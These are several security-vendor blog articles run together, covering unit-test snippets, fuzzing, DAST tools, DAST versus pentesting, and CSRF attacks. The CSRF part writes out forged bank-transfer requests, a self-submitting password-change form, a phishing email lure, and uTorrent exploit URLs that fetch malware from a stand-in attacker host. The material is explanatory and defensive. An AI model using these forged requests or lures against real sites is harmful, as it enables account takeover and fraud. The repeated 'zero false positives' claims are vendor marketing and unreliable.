For example, the first block in the “describe” container is always “beforeEach”—you can then run additional blocks to compile components and verify that the system creates the tested component. The second block might demonstrate the accessibility of the component’s properties—only the title property is added by default. 

The following code will reveal if the component’s title remains the same as the title you set:

it(`title should be 'example-unit-test'`, async(() => {
     const fixture = TestBed.createComponent(ExampleComponent);
     const app = fixture.debugElement.componentInstance;
     expect(app.title).toEqual('example-unit-test');
}));

You can use a third block to show how your test behaves in a browser environment. Once you’ve created the testing component, the system calls an instance of your component to simulate how it runs on the browser. You can then access child elements of the rendered component by accessing its nativeElement object:

it('title should render in a h2 tag', async(() => {
   const fixture = TestBed.createComponent(ExampleComponent);
   fixture.detectChanges();
   const compiled = fixture.debugElement.nativeElement;
   expect(compiled.querySelector('h2').textContent).toContain('Start example-unit-test');
}));

Related content: Read our guide to unit testing in Angular (coming soon)

Unit Tests in Node.js

You can use the Node.js framework to execute server-side JavaScript. This open source platform supports the Mocha JavaScript testing framework (among others). You can use special Mocha keywords in the test API to indicate that your code is a unit test. For example, describe() indicates a group of test cases (arbitrarily nested), while it() indicates a single unit test.

Here is an example of a simple test suite containing a single test case, using the Chai assertion library: 

const {describe, it} = require('mocha');

const chai = require('chai');

describe('Example test suite:', function() {
    it('2 === 2 should be true', function() {
        chai.assert.isTrue(2 === 2);
    });
});

The test’s output should confirm the it() test case (in this case, 2 === 2 should be true) with a tick and indicate the run time in milliseconds. You can use any assertion library, including the built-in Assert module (although this is not recommended).

Related content: Read our guide to unit testing in Node.js (coming soon)

Unit Tests in React 

You can use the open source React Native framework to build and test mobile applications. React Native ships with Jest, a JavaScript test framework with a simple unit testing solution. Because Jest is usually pre-installed in most React Native applications, you only need to open the package.json file and set the Jest preset to react-native.

In this example, you create a sum function adding two numbers—this should be a simple equation where you already know the answer. You import the sum function into the test file under the title ExampleSumTest.js:

const ExampleSum = require('./ExampleSum');

test('ExampleSum equals 4', () => {
    expect(ExampleSum(2, 2)).toBe(4);
});

The output should specify if the test passed, confirming the sum as the expected result, and specifying the passing time in milliseconds:

PASS ./ExampleSumTest.js
✓ ExampleSum equals 4 (5ms)

Related content: Read our guide to unit testing in React (coming soon)

Unit Testing with Bright

Bright is a developer-first Dynamic Application Security Testing (DAST) scanner, and the first of its kind to integrate into unit testing, shifting security testing even further left. You can now test every component and function at the speed of unit tests, baking security testing into development and CI/CD pipelines to minimize security and technical debt by scanning early and often, spearheaded by developers. With no false positives, you can trust your scanner when testing your applications and APIs (SOAP, REST, GraphQL), built for modern technologies and architectures. Sign up now for a free account and read our docs to learn more.

What Is Fuzzing (Fuzz Testing)? Everything You Need to Know

Table of Content

  1. What is Fuzzing?
  2. Why are the World’s Biggest Companies Implementing Fuzz Testing?
  3. Types of Fuzzing Tools
  4. How Does Application Fuzzing Work?
  5. Bright: Fuzz Testing for Application Security
  6. Types of Fuzzing: Mutation, Generation, and Grammar-Based
  7. Common Application Fuzzing Limitations
  8. Fuzzing Tools and Frameworks You Should Know
  9. Interpreting Application Fuzzing Results and Reducing False Positives
  10. See Additional Guides on Key Machine Learning Topics

What is Fuzzing?

Fuzzing is the art of automatic bug detection. The goal of fuzzing is to stress the application and cause unexpected behavior, resource leaks, or crashes. 

The process involves throwing invalid, unexpected, or random data as inputs at a computer. Fuzzers repeat this process and monitor the environment until they detect a vulnerability. 

Threat actors use fuzzing to find zero-day exploits – this is known as a fuzzing attack. Security professionals, on the other hand, leverage fuzzing techniques to assess the security and stability of applications.

This is part of an extensive series of guides about machine learning.

Why are the World’s Biggest Companies Implementing Fuzz Testing?

Some of the world’s biggest and most respected organizations are implementing fuzzing as part of their quality control and cybersecurity operations:

  • Google uses fuzzing to check and protect millions of lines of code in Chrome. In 2019, Google discovered more than 20,000 vulnerabilities in Chrome via internal fuzz testing.
  • Microsoft uses fuzzing as one of the stages in its software development lifecycle, to find vulnerabilities and improve the stability of its products.
  • The US Department of Defense (DoD) issued a DevSecOps Reference Design and an Application Security Guide, both of which require fuzz testing as a standard part of software development processes.

These and many other organizations are adopting fuzzing into their standard development processes for several reasons:

  • Fuzzing does not just identify the problem, it also shows the cause of the problem and how an attacker may interact with it in a real-life attack.
  • Fuzzing proves a vulnerability exists, identifying problems without having to sift through false positives.
  • Fuzzing is fully automated, and can run independently for days or even weeks, identifying more and more vulnerabilities in a system under test.
  • Fuzzing is highly useful for developers. The role of developers is to develop and improve product features. While traditional security tools only point out flaws, fuzzers show the result of the flaw and demonstrate the impact of solving it.

Types of Fuzzing Tools

Fuzzing tools can be grouped into four basic types.

Grammar-Based vs. Mutation Fuzzing

Grammar-based and mutation fuzzers are defined by the way they handle test case generation. Some fuzzers combine both approaches.

Grammar-based fuzzers generate new test cases from a supplied model. The tester defines a “grammar”, specifying the format of inputs accepted by the application, and can define which parts of the input should be fuzzed. The fuzzer uses this model to generate a large number of inputs, which are similar to legitimate inputs, but violate some of the application’s constraints.
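A toy grammar-based generator might look like the sketch below, where the "grammar" is a DD-MM-YYYY date format and the field ranges are deliberately loose assumptions, so generated inputs follow the format but can violate semantic constraints (such as day 99):

```javascript
function randInt(min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}

// Follows the DD-MM-YYYY shape but allows semantically invalid field values.
function generateDate() {
  return `${randInt(0, 99)}-${randInt(0, 99)}-${randInt(0, 9999)}`;
}

const sample = generateDate(); // e.g. "99-0-7312"
```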

Mutation fuzzers randomly mutate a supplied seed input. They are not constrained by a specific model, and “go crazy” by generating large numbers of unusual inputs. This can be very successful at identifying new bugs or execution paths that a user-defined grammar might not have covered.
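The core step of a mutation fuzzer can be sketched in a few lines, here by flipping the bits of one randomly chosen character in a seed input (the JSON seed is illustrative):

```javascript
// Minimal mutation step: corrupt one random character of the seed.
function mutate(seed) {
  const i = Math.floor(Math.random() * seed.length);
  const flipped = String.fromCharCode(seed.charCodeAt(i) ^ 0xff);
  return seed.slice(0, i) + flipped + seed.slice(i + 1);
}

const seed = '{"user":"alice"}';
const mutant = mutate(seed); // same length, one corrupted character
```

A real fuzzer repeats this loop millions of times, feeding each mutant to the target and watching for crashes or hangs.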

Black-Box vs. White-Box Fuzzing

Fuzzers can also be grouped into either black-box or white-box approaches.

Black-box fuzzers don’t have access to program artifacts and are more commonly used by cybersecurity researchers looking for vulnerabilities in commercial products. Black-box fuzzing randomly mutates program inputs and sees how the program reacts to it. It can be highly effective in finding new bugs and security issues.

White-box fuzzers by definition require access to program source code. They are commonly used by red teams working for organizations responsible for systems or by software testing groups.

White-box fuzzing involves sweeping the program and identifying conditional branches and constraints on inputs. The fuzzer then systematically violates each of the constraints and evaluates the response. 

This is a very comprehensive process that, in theory, can reach all possible execution paths of the program. It can usually discover more bugs than a black-box approach, but it does not test the software from an external, attacker's perspective.

How Does Application Fuzzing Work?

As we established above, fuzzing is a great tool for finding zero-day vulnerabilities, but how does a fuzzer actually work?

1. Generating Test Cases

First, test cases are generated. Each security test case can be generated as a random, or semi-random data set, and then sent as input to the application.

The data set can be either generated in conformance to the format requirements of the system’s input, or as a completely malformed chunk of data the system was not meant to understand or process.

What do you think would happen to an application if negative numbers, null characters, or even special characters, were sent to some input fields? Do you know how your application would behave?
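As an illustration of the questions above, here are a few classic edge-case values a fuzzer might throw at a numeric input field, checked against a hypothetical validator (both the values and the validator are assumptions):

```javascript
// Hypothetical validator under test: accepts only positive integers.
function isValidQuantity(v) {
  return Number.isInteger(v) && v > 0;
}

const edgeCases = [-1, 0, Number.MAX_SAFE_INTEGER, "\u0000", "'; DROP TABLE--"];
const rejected = edgeCases.filter((v) => !isValidQuantity(v));
// Only Number.MAX_SAFE_INTEGER passes; a fuzzer's real interest is how the
// application behaves when handed the rejected values.
```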

2. Interfacing with the Target to Deliver the Input

While fuzz testing, a fuzzer can interface with an application, a protocol, or a file format. While doing that, a fuzzer sends test cases to the target over the network or via a command-line argument of a running application.

Imaginative use cases can reveal ways to expose a relevant piece of code with the right specific data.

3. Monitoring the System to Detect Crashes

The success of a fuzz test is measured by the ability to confirm the impact that a fuzzer has on the targeted application.

Bright: Fuzz Testing for Application Security

Bright is the world’s first AI-Powered Application Security Fuzz-testing tool.

Bright offers the combination of the world’s leading DAST solution and a self-evolving, adaptive-learning fuzzer. Bright applies evolution strategies and reinforcement learning to extensively analyze the response of the application and the context of a given attack surface, breaking the assumed scope of the target. Bright reports vulnerabilities that are invisible to other, unintelligent fuzz testing tools.

Bright combines different technologies to raise efficiency and performance as the most comprehensive, reliable, and accurate solution. Bright comes with zero false positives.

Learn more about Bright Dynamic Application Security Testing

Types of Fuzzing: Mutation, Generation, and Grammar-Based

When people ask what application fuzzing is, they usually want to know how it works in practice. The answer usually starts with its types.

Mutation-based fuzzing is the most common type. It takes an existing input and changes it slightly, for example by flipping characters or injecting unusual values, to see how the application reacts. Generation-based fuzzing is different: it creates inputs from scratch using predefined rules, which makes it more controlled but also requires more setup.

Then there is grammar-based fuzzing. It is useful for structured formats like XML or JSON: it knows the structure and produces inputs that are syntactically valid but still unusual. Each type has its place, depending on how the application handles input and where you suspect the weaknesses are.

Common Application Fuzzing Limitations

Understanding what application fuzzing is also means knowing where it falls short. Fuzzing is powerful, but it is not a magic solution that fixes everything.

One common problem is coverage: fuzzing tools may exercise many inputs but miss deeper logic paths, especially in applications with authentication or multi-step workflows. Another challenge is noise: fuzzing can trigger many crashes or odd behaviors that do not always indicate a real weakness.

There is also the problem of context. Fuzzing tools do not understand business logic, so they may miss issues that only appear under certain conditions. Setup can also be a barrier, since effective fuzzing takes time to configure. Fuzzing therefore works best when combined with other testing approaches.

Fuzzing Tools and Frameworks You Should Know

If you are learning about application fuzzing, you will eventually encounter the tools that make it possible. Each tool has a slightly different purpose.

For system-level or binary fuzzing, tools like American Fuzzy Lop (AFL) are widely used. They focus on finding crashes by mutating inputs. For web applications, tools like Burp Suite or OWASP ZAP include fuzzing features that let you test parameters and endpoints.

There are also frameworks designed for APIs and structured data, where fuzzing needs to respect input formats. Some teams even build custom fuzzing tools tailored to their applications. The choice depends on what you are testing: web apps, APIs, or system-level code. No single tool fits every use case.

Interpreting Application Fuzzing Results and Reducing False Positives

Running an application fuzzer is one thing; making sense of the results is another. When people ask what application fuzzing is, they often overlook how much work goes into analyzing the output.

Application fuzzing can generate hundreds or even thousands of results, and not all of them are important. Some crashes are harmless, while others point to real weaknesses. The challenge is figuring out which is which.

This is where validation becomes important. Instead of just flagging issues, teams need to confirm whether a finding is actually exploitable. Reproducing the issue, checking logs, and understanding application behavior all play a role.

Reducing false positives is not about ignoring results. It is about filtering them intelligently so teams can focus on the findings that really matter.

See Additional Guides on Key Machine Learning Topics

Together with our content partners, we have authored in-depth guides on several other topics that can also be useful as you explore the world of machine learning.

Advanced Threat Protection

Authored by Cynet

Multi GPU

Authored by Run.AI

Auto Image Crop

Authored by Cloudinary

6 Best DAST Tools You Should Know in 2024

What are DAST Tools?

Dynamic application security testing (DAST) tools provide automated security testing for various real-world threat scenarios. You can use DAST tools to identify security vulnerabilities in running applications, and remediate them so external threat actors cannot exploit them.

Unlike white-box testing, which involves getting access to the source code, DAST takes a black-box approach, emulating an external attacker. DAST tools interact with web applications and APIs and identify which vulnerabilities can actually be exploited by attackers. They can then provide actionable insights to developers to help them remediate those vulnerabilities.

In this article:

Why Do You Need DAST Software?

DAST software can help you identify security weaknesses and fix them, ideally before attackers can exploit them to hack your application. Here are several threats you can identify using DAST tools:

  • SQL injection (SQLi)—a web-based attack that enables threat actors to gain access and control over a web application database. Threat actors achieve this by inserting arbitrary SQL code into a database query. 
  • Cross-site scripting (XSS)—this vulnerability enables threat actors to inject malicious code into a web application. Once they’re in, threat actors can steal session cookies, user credentials, or other sensitive information.
  • eCommerce attacks—threat actors look for vulnerabilities in eCommerce platforms and content management systems (CMS) that provide easy targets. They try to stay in for a long time to reach as many targets as possible.
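To see why the SQL injection attack from the list above works, compare naive string concatenation with a parameterized query (the table name and input value are illustrative assumptions):

```javascript
const userInput = "' OR '1'='1";

// Unsafe: the injected quote turns the WHERE clause into a tautology,
// returning every row in the table.
const unsafe = `SELECT * FROM users WHERE name = '${userInput}'`;

// Safer: the driver binds the value separately, so it is treated as data,
// never as SQL.
const safeQuery = "SELECT * FROM users WHERE name = ?";
const params = [userInput];
```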

Successful attacks on web applications can result in information theft, especially when the breach goes undetected. Threat actors can exploit web application vulnerabilities to gain unauthorized access to personally identifiable information (PII) and credit card information. 

DAST tools provide visibility into potential weaknesses and application behaviors that threat actors can exploit. These tools aim to provide you with this information before threat actors can discover and capitalize on these vulnerabilities.

Related content: Read our guide to DAST vs SAST

6 DAST Solutions and Tools

Bright Security

Bright Security tests every aspect of your apps. It enables you to scan any target, including web applications, internal applications, APIs (REST/SOAP/GraphQL), and server side mobile applications. It seamlessly integrates with the tools and workflows you already use, automatically triggering scans on every commit, pull request or build with unit testing. Scans are blazing fast, enabling Bright to work in a high velocity development environment.

Instead of just crawling applications and guessing, Bright interacts intelligently with applications and APIs. Our AI-powered engine understands application architecture and generates sophisticated and targeted attacks. By first verifying and exploiting the findings, we make sure we don’t report any false positives. 

Related content: Read our guide to IAST vs DAST.

Key features include:

  • Seamlessly integrates with existing tools and workflows—works with your existing CI/CD pipelines. Trigger scans on every commit, pull request or build with unit testing.
  • Spin-up, configure and control scans with code—one file, one command, one scan with no need for UI-based configuration.
  • Super-fast scans—interacts with applications and APIs, instead of just crawling them and guessing. Scans are made faster by an AI-powered engine that can understand application architecture and generate sophisticated and targeted attacks.
  • No false positives—uses AI analysis and fuzz testing to avoid returning false positives, so developers and testers can focus on releasing code.

Get a free plan and try Bright Security today!

Zed Attack Proxy (ZAP)

License: Apache 2.0

GitHub Repo: https://github.com/zaproxy/zaproxy 

OWASP ZAP (Zed Attack Proxy) is an open source web application security scanner. It is suitable both for experienced penetration testers and developers and QA testers who do not have security expertise. 

ZAP is now the most active project maintained by OWASP, with thousands of individual contributors. It is available in 29 languages on Linux, Windows, and Mac. It also acts as a proxy server to handle HTTP/S requests, and includes a daemon mode that can be controlled using a REST API.

Key features include:

  • Automated passive scanning
  • HTTP/S proxy server
  • Port identification
  • Directory searching
  • Brute force attack
  • Web crawler
  • Fuzz testing

Nikto 

License: GPL 2.0

GitHub Repo: https://github.com/sullo/nikto 

Nikto is an open source web server scanner that can check for:

  • Currently installed web server software
  • 6700 potentially dangerous files on a web server
  • Old versions of 1250 server packages
  • Version-specific issues on 270 server packages
  • Misconfigurations such as multiple index files, content delivered over HTTP

The project is actively maintained with new scan items and plug-ins updated regularly. A downside is that this tool is not stealthy and scans might be blocked by IPS/IDS systems. For a more realistic test, you can try combining this tool with LibWhisker to circumvent IDS.

GoLismero

License: GPL 2.0

GitHub Repo: https://github.com/golismero/golismero 

GoLismero is an open source framework for security testing focused on web security. Key features include:

  • Works on any platform, tested on Windows, Linux, *BSD, Apple OS X.
  • Written in pure Python with no library dependencies.
  • High performance compared to similar frameworks. 
  • Easy to learn, use, and develop custom plugins.
  • Integrates and collects results from other popular tools like sqlmap, XSSer, OpenVAS.
  • Enables scans for vulnerabilities according to CWE, CVE, and OWASP definitions.

Nuclei

License: MIT

GitHub Repo: https://github.com/projectdiscovery/nuclei 

Nuclei provides security scanning across protocols and services such as TCP, DNS, HTTP, SSL, File, Whois, and WebSocket. It uses a flexible templating engine that lets it conduct a variety of security checks. Because the tool sends requests based on templates, it can run fast scans across many hosts with no false positives.

Nuclei has a repository of vulnerability templates contributed by over 300 security researchers. These include:

  • 1114 templates for specific CVEs
  • 454 templates for LFI vulnerabilities
  • 351 templates for XSS vulnerabilities
  • 281 templates for RCE vulnerabilities
  • 246 templates for testing vulnerable WordPress plugins

See a full list of templates here.

Deepfence ThreatMapper

License: Apache 2.0

GitHub Repo: https://github.com/deepfence/ThreatMapper 

ThreatMapper automatically detects, identifies, and queries cloud-based infrastructure. It works with compute instances in public clouds, Kubernetes nodes, and serverless resources, helping to discover cloud native applications and containers and map their topology in real time. The tool can help discover and visualize attack surfaces in cloud native workloads.

Key features include:

  • Scanning build artifacts for vulnerabilities during builds and integrating with CI/CD pipelines.
  • Prioritizing vulnerabilities based on CVSS scores.
  • Scanning container registries for vulnerable containers before deployment.
  • Scanning production environments for host, container, and application vulnerabilities.
  • Discovering production applications, including complex microservices applications, and mapping their topology.
  • Continuously scanning production systems to identify new vulnerabilities.
  • Scanning hosts and containers and recommending configuration hardening.
  • Capturing and archiving network traffic, including TLS decryption.

Conclusion

While there are many solutions out there, Bright Security is at the forefront of DAST technology. We have raised a $20 million funding round to continue pioneering the field, helping secure apps and APIs, without slowing down software development processes.

Learn more about Bright Security—the state of the art in DAST technology 

DAST vs Penetration Testing: What Is the Difference?

What Is DAST?

Dynamic Application Security Testing (DAST) is a solution used to analyze web applications at runtime to identify security vulnerabilities and misconfigurations. DAST tools provide an automated way to scan running applications and try to attack them from a hacker’s perspective. They can then offer valuable insights into how applications are behaving, identify where hackers can launch attacks, and provide actionable guidance on how to remediate vulnerabilities.

DAST tools take a black box approach to testing. They run outside the application without having access to its source code or internal architecture. DAST can be used to identify and resolve common web application vulnerabilities including broken access control, cross-site scripting (XSS), SQL injection (SQLi), and cross-site request forgery (CSRF).

What Is Penetration Testing?

Penetration testing (also called pentesting) is a cybersecurity technique used by organizations to identify, actively exploit, and remediate vulnerabilities in applications and their security controls. Penetration tests are usually conducted by ethical hackers, who can be internal employees or contractors of an organization. 

Ethical hackers use the same tactics and behaviors as real hackers to assess how an organization’s computer systems, networks, or web applications could be attacked. Organizations can use the resulting report of a penetration test to discover and remediate vulnerabilities, and for compliance purposes.

Ethical hackers are security professionals who use a variety of methods, tools, and techniques to simulate cyberattacks against an organization. The term “penetration” refers to the degree to which a hypothetical threat actor or hacker can break past an organization’s security measures and cause damage.

In this article:

How Is a Typical Pen Test Carried Out?

Step 1: Reconnaissance

Penetration testing begins with reconnaissance. At this stage, ethical hackers spend time gathering data they use to plan their simulated attack. Based on this data, they identify vulnerabilities, find a viable attack vector, and gain and maintain access to the target system. 

Step 2: Exploitation

The penetration testing process requires an extensive set of tools. These include network and vulnerability scanning software, as well as tools that can launch specific attacks and exploits such as brute-force attacks or SQL injections. There is also hardware designed specifically for penetration testing. For example, there are hardware devices that connect to a computer on a network and give hackers remote access to that network. 

Another tool in the pentesting arsenal is social engineering. Ethical hackers might use techniques like phishing emails, pretexting (pretending to be an authority or someone known by the victim), and tailgating (entering a building immediately after an authorized person).

Step 3: Disengagement

After a penetration tester achieves access to sensitive systems and demonstrates their ability to steal data or perform other damage, they disengage, covering their tracks to avoid detection.

Step 4: Report and resolution of discovered weaknesses

The final and most important stage of a penetration test is the pentest report. This is a detailed report the ethical hacker shares with the target company’s security team. It documents the pentesting process, vulnerabilities discovered, proof that they are exploitable, and actionable recommendations for remediating them. 

Internal teams can then use this information to improve security measures and remediate vulnerabilities. Remediation can include patching vulnerable systems, rate limiting, new firewall or WAF rules, DDoS mitigation, and stricter form validation.

How Does DAST Work?

DAST tools go into action when an application is deployed, either in a test or staging environment or in a real production environment. They can continuously scan applications to discover new vulnerabilities or misconfigurations that are introduced over time.

Most DAST tools only test the exposed HTTP and HTML interfaces of web-enabled applications, but some also support APIs and protocols like Remote Procedure Call (RPC) and Session Initiation Protocol (SIP). DAST tools start by crawling web applications to identify URLs, forms, and other exploitable elements. A DAST tool attempts to find all the ways an application accepts input from users, testing these inputs one by one.
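The input-probing step described above can be sketched as generating one request per payload for a discovered parameter (the URL and payload list are illustrative assumptions):

```javascript
// Payloads a DAST scanner might try against a discovered "q" parameter.
const payloads = ["'", "<script>alert(1)</script>", "../../etc/passwd"];

const probes = payloads.map(
  (p) => `https://app.example/search?q=${encodeURIComponent(p)}`
);
// Each probe is sent and the response is inspected for error messages,
// reflected input, or other signs of a vulnerability.
```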

DAST tools can be automatically run at multiple stages of the testing and deployment process, allowing teams to quickly identify and address risks before security incidents occur. When a vulnerability is discovered, the DAST solution sends an automatic alert to the appropriate development team for the developer to fix. Some DAST solutions integrate directly with bug trackers to integrate smoothly into the development process.

DAST works best as part of a comprehensive approach to web application security testing. While DAST provides security teams with timely insight into how web applications behave in production environments, businesses often use DAST for application penetration testing and static application security testing (SAST) to discover additional vulnerabilities during early development stages.

Related content: Read our guide to DAST vs. SAST

DAST vs Penetration Testing

DAST and penetration testing are often confused because of their role in helping detect application vulnerabilities. What they have in common is that both of them are black box testing techniques, which attempt to exploit vulnerabilities in applications. However, the similarities end there:

  • DAST uses a dynamic approach to testing web applications, while penetration testers can use both dynamic and static methods.
  • DAST tools are automatic, while penetration tests are usually manual (although there is a growing category of automated penetration testing tools)
  • DAST tools can be run at any time, enabling continuous testing and scanning of an application. Manual penetration tests are performed infrequently—typically quarterly or annually.
  • DAST tools are inexpensive and can typically be run as many times as needed (depending on the licensing model). Penetration tests conducted by ethical hackers are high-cost and limited to a single, well-scoped penetration test.
  • DAST tools can generate false positives—they might discover issues that are not real vulnerabilities. Penetration testing, by definition, does not result in false positives. However, modern DAST tools use artificial intelligence (AI) and fuzzing techniques to close this gap and provide reports with zero false positives.
  • DAST tools can be run by anyone—security teams, developers, or even automatically with no human intervention. Pentesting requires deep expertise.
  • DAST tools have higher return on investment (ROI) because they can discover issues earlier in the development process. Pentesting is almost always conducted on production applications, so the cost of fixing issues is much higher.

Bright Security’s Next-Gen DAST Solution

Unlike other DAST solutions, Bright Security was built from the ground up with developers in mind. It lets developers automatically test their applications and APIs for vulnerabilities with every build.

Bright Security tests every aspect of your apps. It enables you to scan any target, including web applications, internal applications, APIs (REST/SOAP/GraphQL), and server-side mobile applications. It seamlessly integrates with the tools and workflows you already use, automatically triggering scans on every commit, pull request, or build, alongside your unit tests. Scans are blazing fast, enabling Bright to work in a high-velocity development environment.

Instead of just crawling applications and guessing, Bright interacts intelligently with applications and APIs. Our AI-powered engine understands application architecture and generates sophisticated and targeted attacks. By first verifying and exploiting the findings, we make sure we don’t report any false positives. 

Get a free plan and try Bright Security today!

3 Simple CSRF Examples: Understand CSRF Once and For All

What is CSRF (Cross Site Request Forgery)?

Cross-site request forgery (CSRF) is a technique that enables attackers to impersonate a legitimate, trusted user. CSRF attacks can be used to change firewall settings, post malicious data to forums, or conduct fraudulent transactions. In many cases, affected users and website owners are unaware that an attack occurred, and become aware of it only after the damage is done and recovery is not possible.

CSRF attacks exploit a mechanism that makes the sign-in process more convenient. Browsers often automatically include credentials in the request when a user tries to access a site. These credentials can include the user’s session cookies, basic authentication credentials, IP address, and Windows domain credentials.

If there is no protection against CSRF attacks, it can be easy for an attacker to hijack the session and impersonate the user. Once a user is authenticated on the site, the site cannot differentiate between a legitimate request from that user and a forged request sent by the attacker.
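The server-side blind spot can be demonstrated with a toy handler. This is a deliberately simplified sketch (plain dicts stand in for real HTTP requests and a session store): the only check is the session cookie, so a forged request is indistinguishable from a legitimate one.

```python
# Toy request handler that authenticates by session cookie alone.
# The session ID below is hypothetical, chosen for illustration.
SESSIONS = {"d33567b639c534e664": "victim"}

def handle_transfer(cookies, params):
    user = SESSIONS.get(cookies.get("SESSION"))
    if user is None:
        return "401 Unauthorized"
    # Nothing here reveals which page or site triggered the request.
    return f"transferred ${params['amount']} from {user} to account {params['acct']}"

# A legitimate click and an attacker-induced request look the same server-side:
legit  = handle_transfer({"SESSION": "d33567b639c534e664"},
                         {"acct": "344344", "amount": "5000"})
forged = handle_transfer({"SESSION": "d33567b639c534e664"},
                         {"acct": "224224", "amount": "50000"})
print(legit)
print(forged)
```

Both calls succeed because the browser attaches the same valid cookie to both; CSRF defenses work by adding a secret the attacker cannot supply.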


CSRF Attack Examples

1. Bank Transfer Using GET or POST

Consider a user who wants to transfer an amount of $5,000 to a family member via the web application of Acme Bank, which has a CSRF vulnerability. An attacker identifies this vulnerability and wants to intercept this transaction so that the funds are transferred to their bank account instead of to the intended recipient.

The attacker can construct two types of URLs to perform the illicit funds transfer, depending on whether the application was designed using GET or POST requests.

Forged GET request

The original request would look something like this, transferring the amount to account #344344:

GET http://acmebank.com/fundtransfer?acct=344344&amount=5000 HTTP/1.1

The attacker’s forged request might look like this. The attacker changes the account number to their own account (#224224 in this example) and increases the transfer amount to $50,000:

http://acmebank.com/fundtransfer?acct=224224&amount=50000

Now the attacker needs to trick the victim into visiting this forged URL while signed into the banking application. The attacker might draft an email like this:

To: Victim
Subject: A gift of flowers for you!

Hello victim,
We know your birthday is coming up and have a special gift for you. Just click here to receive it!

The link “click here” would lead to the forged URL shown above.

Alternatively, the attacker could embed a tracking pixel in the email that fires the URL automatically if the victim's email client loads images. This is more dangerous because it requires no direct user action.

Forged POST request

If the banking application uses POST requests, the user’s original operation would look like this:

POST http://acmebank.com/fundtransfer HTTP/1.1
acct=344344&amount=5000

In this case, the attacker would need to craft a <form> element with the forged request (the markup below is reconstructed for illustration):

<form action="http://acmebank.com/fundtransfer" method="POST">
  <input type="hidden" name="acct" value="224224"/>
  <input type="hidden" name="amount" value="50000"/>
  <input type="submit" value="Click here to receive your gift!"/>
</form>
When the user submits the form, believing they will receive a gift, the post request is executed and, if the user is currently signed into the application, the illicit transfer is carried out.

2. Changing Password with Self-Submitting Form

Consider a vulnerable application that allows users to change their password via a POST request. The original form looks something like this (reconstructed for illustration):

<form action="https://acmebank.com/password.php" method="POST">
  <input type="text" name="password"/>
  <input type="submit" value="Change password"/>
</form>

The attacker can create a copy of this form, changing the password to one known by the attacker (123 in this example):

<form action="https://acmebank.com/password.php" method="POST">
  <input type="hidden" name="password" value="123"/>
</form>
<script>document.forms[0].submit();</script>
Unlike the original form, the attacker’s version does not have a submit button, and has a script that automatically submits the form as soon as the user loads the HTML.

The attacker hosts this form on a malicious website. To trick users, they can use a domain name similar to the bank’s one, like this: 

https://acme-bank.biz/password.html

The attacker needs to trick the victim into visiting the above URL—for example by sending an email that is supposedly from the bank. When a victim visits the URL, the following HTTP POST is generated:

POST /password.php HTTP/1.1
Host: acmebank.com
Origin: http://acme-bank.biz
Referer: https://acme-bank.biz/password.html
Cookie: SESSION=d33567b639c534e664
Content-Type: application/x-www-form-urlencoded

password=123

In this forged POST request, the Host is the vulnerable application, acmebank.com, but the Origin and Referer indicate the request is really coming from the attacker’s malicious site, acme-bank.biz. We are assuming the user previously signed into the banking application so the Cookie field retains their valid session ID. 

This vulnerable application will authenticate the request based on the recognized session ID, and accept the form contents, changing the password to the attacker’s desired string.

3. Real-Life uTorrent Attack: Deploying Malware via Forged GET Request

The uTorrent vulnerability disclosed in 2008 (CVE-2008-6586) led to a real-life, large-scale CSRF attack. The uTorrent software exposed its web console at localhost:8080 without CSRF protection, allowing attackers to perform sensitive actions with a simple GET request.

uTorrent built its web interface in such a way that GET requests enabled state-changing operations. According to the HTTP/1.1 standard (RFC 2616), GET and HEAD methods should never be state changing, and should only be used to allow clients to retrieve data.

Attackers discovered two exploitable URLs that could allow them to deploy malware to a victim’s device. This URL forced a torrent file download:

http://localhost:8080/gui/?action=add-url&s=http://attacker-site.com/malware

This URL changed the administrator password of the uTorrent software:

http://localhost:8080/gui/?action=setsetting&s=webui.password&v=newpassword

The attackers added HTML elements with automatic actions triggered by JavaScript on multiple Internet forums, and also sent spam emails with these elements to a large distribution list. Anyone running the uTorrent application who visited the forum page or opened the email was hit by the attack. This enabled the attackers to deploy malware on a large number of client devices.

Related content: See more real-life attack examples in our guide to CSRF attacks

Preventing CSRF Attacks

Implementing CSRF Tokens

Organizations can easily block most CSRF attacks using CSRF tokens. These are unique challenge tokens that can be added to sensitive user requests, such as making a purchase, transferring funds, or creating an admin account on the website backend. Developers can add a CSRF token to every state change request and properly validate these tokens when processing the request, to ensure that the authenticated user sent the request legitimately.

Whenever the server renders a page with a sensitive operation, a unique CSRF token is passed to the user. For this to work properly, the server must perform the requested operation only when the token is fully validated, and reject all requests with invalid or missing tokens. A common mistake when implementing CSRF protection is to reject requests with invalid tokens but continue accepting requests with missing tokens, which renders the protection ineffective.
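The validation rule above can be sketched as a small, framework-agnostic example. This is an illustration under simplifying assumptions (the session is a plain dict, and the helper names are hypothetical); a real application would use its framework's built-in CSRF support.

```python
import secrets

def issue_token(session):
    # Generate a fresh, unguessable token and store it server-side;
    # the caller embeds it in the rendered form as a hidden field.
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def validate_token(session, submitted):
    expected = session.get("csrf_token")
    # Reject missing tokens as firmly as invalid ones -- accepting
    # requests with no token at all defeats the protection entirely.
    if not expected or not submitted:
        return False
    # Constant-time comparison avoids leaking the token via timing.
    return secrets.compare_digest(expected, submitted)

session = {}
token = issue_token(session)
print(validate_token(session, token))    # True  -- legitimate form submission
print(validate_token(session, "forged")) # False -- invalid token rejected
print(validate_token(session, None))     # False -- missing token rejected too
```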

Related content: Read our guide to CSRF tokens

Checking for CSRF Vulnerabilities

To check for a CSRF vulnerability, look for a form where users can submit a request and verify that the anti-CSRF token was generated correctly. Most modern web frameworks include an anti-CSRF token on every form page and can be configured globally to handle validation transparently. 

Whenever a user can submit a request that changes system state, the request must be protected with a CSRF token. If the form is not intended to allow users to make stateful changes, developers must limit its scope to prevent abuse by attackers.

Combining CSRF Tokens with Other Protections

CSRF tokens can also be used with other protective techniques, such as: 

  • Setting session cookies using the SameSite cookie attribute. This attribute instructs the browser whether cookies may be sent with requests originating from third-party domains. 
  • Adding the HttpOnly property to avoid some types of cross-site scripting (XSS) flaws. Preventing XSS vulnerabilities can also make it more difficult to conduct CSRF attacks.
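Both attributes can be set with the standard library alone. The sketch below builds a Set-Cookie header value with SameSite, HttpOnly, and Secure set (the session value is the illustrative one used earlier in this article):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "d33567b639c534e664"
cookie["session"]["samesite"] = "Lax"   # withhold the cookie on cross-site POSTs
cookie["session"]["httponly"] = True    # not readable from JavaScript (limits XSS)
cookie["session"]["secure"] = True      # only sent over HTTPS

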